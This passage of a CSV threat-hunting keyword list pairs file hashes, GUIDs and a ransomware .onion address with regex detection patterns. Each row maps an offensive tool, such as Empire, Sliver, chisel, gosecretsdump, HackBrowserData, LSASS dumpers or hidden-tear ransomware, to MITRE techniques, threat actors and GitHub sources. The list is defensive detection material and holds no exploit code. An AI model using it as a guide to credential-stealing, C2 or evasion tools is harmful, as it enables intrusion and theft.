This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39867" "*d7568417704e64ca524b45240eadd4ddabfb1f477f9eecc37f6bc5654ee7d184*",".{0,1000}d7568417704e64ca524b45240eadd4ddabfb1f477f9eecc37f6bc5654ee7d184.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","39868" "*d756b55e894c289704c0f4b0a92bfebee404bd1047494ed81a1948f7eace2b26*",".{0,1000}d756b55e894c289704c0f4b0a92bfebee404bd1047494ed81a1948f7eace2b26.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39869" "*d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99*",".{0,1000}d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","39870" "*d75e6210055b8ace4fb94f7108604081c957b97ce17772efd58d7ff845589ce0*",".{0,1000}d75e6210055b8ace4fb94f7108604081c957b97ce17772efd58d7ff845589ce0.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","39871" "*d75itpgjjfe2ys2qivqplbvmw3yyx7o5e4ppt2esit2lluhngulz4hqd.onion*",".{0,1000}d75itpgjjfe2ys2qivqplbvmw3yyx7o5e4ppt2esit2lluhngulz4hqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39872" "*d76d13a9b90ecf3be14037f420316c75b29a9b2d5f959465ec5459db61442d47*",".{0,1000}d76d13a9b90ecf3be14037f420316c75b29a9b2d5f959465ec5459db61442d47.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39874" "*d7792222dd6c580b5590d1cef292b118d7ebbab6570db74cb459ef9f3ee4c1f5*",".{0,1000}d7792222dd6c580b5590d1cef292b118d7ebbab6570db74cb459ef9f3ee4c1f5.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a 
tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","39878" "*d77f3332083ca55d0cc730c39970b6413430e986c6adae9ece72cceb640da27b*",".{0,1000}d77f3332083ca55d0cc730c39970b6413430e986c6adae9ece72cceb640da27b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39879" "*d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37*",".{0,1000}d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","39880" "*d780a0a408b42bcfbb25fbd591b2396b808aaba7b8358b5543afa3be342023d6*",".{0,1000}d780a0a408b42bcfbb25fbd591b2396b808aaba7b8358b5543afa3be342023d6.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39881" 
"*D78924E1-7F2B-4315-A2D2-24124C7828F8*",".{0,1000}D78924E1\-7F2B\-4315\-A2D2\-24124C7828F8.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","#GUIDproject","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","39882" "*d78fa8da51c45a84c22819f0ab4f2b77135c9e8b48f693dde65384ecc3b8636c*",".{0,1000}d78fa8da51c45a84c22819f0ab4f2b77135c9e8b48f693dde65384ecc3b8636c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39884" "*d7935f00dbd30fe83bd877aa2e841b8aa0c0ded7f2867b677a6e24d3fd3daaba*",".{0,1000}d7935f00dbd30fe83bd877aa2e841b8aa0c0ded7f2867b677a6e24d3fd3daaba.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39886" "*d79a8f7e6ddf7530d9f28267e3ab74849492aae4db6facd46a3b8dd01194738f*",".{0,1000}d79a8f7e6ddf7530d9f28267e3ab74849492aae4db6facd46a3b8dd01194738f.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","39887" "*d79b1291fc162909146710ab8ed6eb9af77c018bf5991e670e5d7b25f3feb095*",".{0,1000}d79b1291fc162909146710ab8ed6eb9af77c018bf5991e670e5d7b25f3feb095.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39888" "*d79d4da3258689d4510878b28b66c5bc15542107d6a25a6c2a55099a31762a22*",".{0,1000}d79d4da3258689d4510878b28b66c5bc15542107d6a25a6c2a55099a31762a22.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","39889" "*d79d89c9bd219dce8baf10adc6a49d404d135228a8bac6d04d9c1a77d6d0b9e5*",".{0,1000}d79d89c9bd219dce8baf10adc6a49d404d135228a8bac6d04d9c1a77d6d0b9e5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39890" "*d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08*",".{0,1000}d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","39891" "*d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08*",".{0,1000}d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/Imanfeng/Telemetry","1","0","#filehash","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","39892" "*d7a5cca2bdf63841127a1618cb25e8e9a5892269fc687ca9a795b895bdbd4ed9*",".{0,1000}d7a5cca2bdf63841127a1618cb25e8e9a5892269fc687ca9a795b895bdbd4ed9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39893" "*d7a74608cdc46702dca5c703ad3bbc40c8b97ce6cea40695b7499987a70a9331*",".{0,1000}d7a74608cdc46702dca5c703ad3bbc40c8b97ce6cea40695b7499987a70a9331.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39894" "*d7add2812de595a486a90bcb598d1ea630254658610f0e19d42af814b8dfa822*",".{0,1000}d7add2812de595a486a90bcb598d1ea630254658610f0e19d42af814b8dfa822.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","39896" "*d7af38341aa0abbe61415eed66c9df434b901425b5c2acfe01b9619530c826a2*",".{0,1000}d7af38341aa0abbe61415eed66c9df434b901425b5c2acfe01b9619530c826a2.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 
- TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","39897" "*d7b2b8c7482b08e79eca66a7f8f1c9752710c1eee7f1c5df3e998c8c8ea31d26*",".{0,1000}d7b2b8c7482b08e79eca66a7f8f1c9752710c1eee7f1c5df3e998c8c8ea31d26.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39898" "*d7bb7585cd1659c0b55b9ec18b10aeecb33af953c547dc0912a4489996da6b31*",".{0,1000}d7bb7585cd1659c0b55b9ec18b10aeecb33af953c547dc0912a4489996da6b31.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39900" "*d7c079211118ebcf3827008bcb577d08967faeb1786506057e8e4fd730cb6420*",".{0,1000}d7c079211118ebcf3827008bcb577d08967faeb1786506057e8e4fd730cb6420.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39901" 
"*d7c63d43b5eb3fa7f99253e4644bf7525246c13238d6ba5d020e1e25e277a133*",".{0,1000}d7c63d43b5eb3fa7f99253e4644bf7525246c13238d6ba5d020e1e25e277a133.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39903" "*d7cd7a952aab71b1a1bb8ae63ce23776e5b4cdd57a1ff1ab747e9fdf0e4a548b*",".{0,1000}d7cd7a952aab71b1a1bb8ae63ce23776e5b4cdd57a1ff1ab747e9fdf0e4a548b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39904" "*d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d*",".{0,1000}d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39905" "*D7D20588-8C18-4796-B2A4-386AECF14256*",".{0,1000}D7D20588\-8C18\-4796\-B2A4\-386AECF14256.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","#GUIDproject","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","39906" 
"*d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67*",".{0,1000}d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39907" "*d7d86b7b1b8535a28ce0bd897ef6e6e5ebaf6e9c153bbb6052f45cea58836f76*",".{0,1000}d7d86b7b1b8535a28ce0bd897ef6e6e5ebaf6e9c153bbb6052f45cea58836f76.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39908" "*d7dc358e43314be5c096f1f011947f422a12a261db64528bb531418eab164638*",".{0,1000}d7dc358e43314be5c096f1f011947f422a12a261db64528bb531418eab164638.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39909" "*d7e3d2ef31bf5905d593420dbd3aa92e709d2524fa63ffa0bb3b75dc2ddc408f*",".{0,1000}d7e3d2ef31bf5905d593420dbd3aa92e709d2524fa63ffa0bb3b75dc2ddc408f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39910" 
"*d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed*",".{0,1000}d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39914" "*d80344fd9c189a4333409958250a0e3ec44a0168e70f5b6b8c78588c8ed3caf4*",".{0,1000}d80344fd9c189a4333409958250a0e3ec44a0168e70f5b6b8c78588c8ed3caf4.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39917" "*d8043ec0bd5263618118ce4f327126c9413fa5f041426117adc0d15e4a168144*",".{0,1000}d8043ec0bd5263618118ce4f327126c9413fa5f041426117adc0d15e4a168144.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39918" "*d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e*",".{0,1000}d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","39919" 
"*D8091ED0-5E78-4AF5-93EE-A5AA6E978430*",".{0,1000}D8091ED0\-5E78\-4AF5\-93EE\-A5AA6E978430.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#GUIDproject","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","39920" "*d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60*",".{0,1000}d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39921" "*d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92*",".{0,1000}d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39923" "*d81858b01de71a850d5c4f69578441c6d91f06dbd96b96c3d78cb6539681816b*",".{0,1000}d81858b01de71a850d5c4f69578441c6d91f06dbd96b96c3d78cb6539681816b.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - 
T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","39924" "*d81d498e8a18f7075fa20adaaa81a754f33513ba4b6ffac9874aff874641c532*",".{0,1000}d81d498e8a18f7075fa20adaaa81a754f33513ba4b6ffac9874aff874641c532.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","39925" "*d829c805dfc29e54769382a8d2378a133cd21627b97a60e2d835ff8d6bbd203c*",".{0,1000}d829c805dfc29e54769382a8d2378a133cd21627b97a60e2d835ff8d6bbd203c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39927" "*d8309dbfb648a5f80ac88634ffaa3a9d613cd31a785b9902a687edbc2d71d73b*",".{0,1000}d8309dbfb648a5f80ac88634ffaa3a9d613cd31a785b9902a687edbc2d71d73b.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39928" "*d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25*",".{0,1000}d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39929" "*d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d*",".{0,1000}d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39930" "*d83b72b8147d812d79c480142f74fa123115349052ab1d88df742c0cc8c1aca5*",".{0,1000}d83b72b8147d812d79c480142f74fa123115349052ab1d88df742c0cc8c1aca5.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 